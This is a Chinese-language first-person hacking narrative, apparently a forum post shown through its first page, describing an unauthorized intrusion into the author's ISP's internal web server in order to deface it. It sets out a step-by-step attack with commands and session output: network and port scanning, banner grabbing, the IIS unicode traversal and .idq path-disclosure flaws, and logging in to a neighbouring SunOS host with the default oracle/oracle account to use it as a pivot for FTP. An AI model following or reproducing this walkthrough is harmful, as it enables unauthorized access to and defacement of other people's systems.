首先申明我并不是一个HACKER，只是一个网络安全爱好者罢了。入侵的动机我保留，只记述过程啦！ 

目标主机：10.75.166.12(我的ISP的真实内部地址）。 

目的：更改其WEB页，还有别的么？呵呵我保留！ 

首先：看看这个网段都有那些机子，还有他们都开什么端口吧！我用scanner(很好的扫描工具） 

查出有N部机子。（其实我早就扫过了，呵呵），哈10.75.166.12只开了21,80 两个端口呀！ 

先FTP上去罗，ftp 10.75.166.12 

unknown ip (10.75.167.87) 

connected refused 

呵呵，拒绝不知名的IP地址的联接！faint...该死的网管！ 

telnet 10.75.166.12 80 

从80端口TELNET进去后会出现一段提示，发现该主机用的是MS-IIS！呵呵漏洞好象蛮多的！ 

IIS5.0有个unicode字符集的漏洞，浏览器吧%c1%2f之类的字符解释成"\"或“/”之类！ 

可以访问一些系统目录在用CMD。EXE可以执行一些程序，或可提交一些ASP文件。具体的方法或原理 

请自己去找资料学习！我么？没用到这个漏洞！那么这台机子都有那些漏洞呢？用twwwscan(超好的web 

漏洞扫描软件，是DOS界面的用BORLAND C++写的，超cool) 

废话少说，twwwscan 10.75.166.12 

哦，，，漏洞真不少。呵呵。有如下几个： 

frontpage的_vti_inf.html 

newdsn.exe 

anything.idq 

.... 

OH！THAT IS ENOUGH！第一个嘛，我们知道它是FRONTPAGE予留的一个HTML文件，没什么用！ 

第二个嘛， 可在目录生成MDB文件，用于D.O.S攻击，把它的硬盘塞满么！！呵呵！对我来说没有价值 

第三个嘛，wow, *.idq这个漏洞顶棒，在浏览器上输入任何后缀为IDQ的文件，一般会返回一个类似 

: "c:\wwwroot\shit.idq"not found! 

呵呵原来网站放在wwwroot下！ 

现在问题是10.75.166.12不支持UNKNOW IP！我都要忍不住骂人了！！！ 

看看刚才扫描过的网段，一个一个telnet再ftp（若开了相应的端口的话）上去，看看有没有 

什么默认帐号，（若没有也不要急，小榕的流光2001来看看有没有弱密码用户） 

我还是比较幸运的10.75.166.11的21，23端口都开，而且都用SUNOS呵呵！ 

我们知到默认的用户oracle的密码还是oracle。可以用10.75.166.11做跳板了！ 

笨网管！！！！别怪我了！ 

telnet 10.75.166.11 

login:oracle 

password: 

welcome! 

SUNOS 

you have a mail! 

oracle@10.75.166.11> 

登陆先看看有没有root! 

oracle@10.75.166.11>who 

哇,没有！COOL！该你倒霉！ 

oracle@10.75.166.11>ftp 10.75.166.12 

ok!connected from 10.75.166.11 

10.75.166.12 IIS 

login:ftp(先试试匿名登陆的权限么！） 

passwd:ftp@shit.com 

[1] [2] 下一页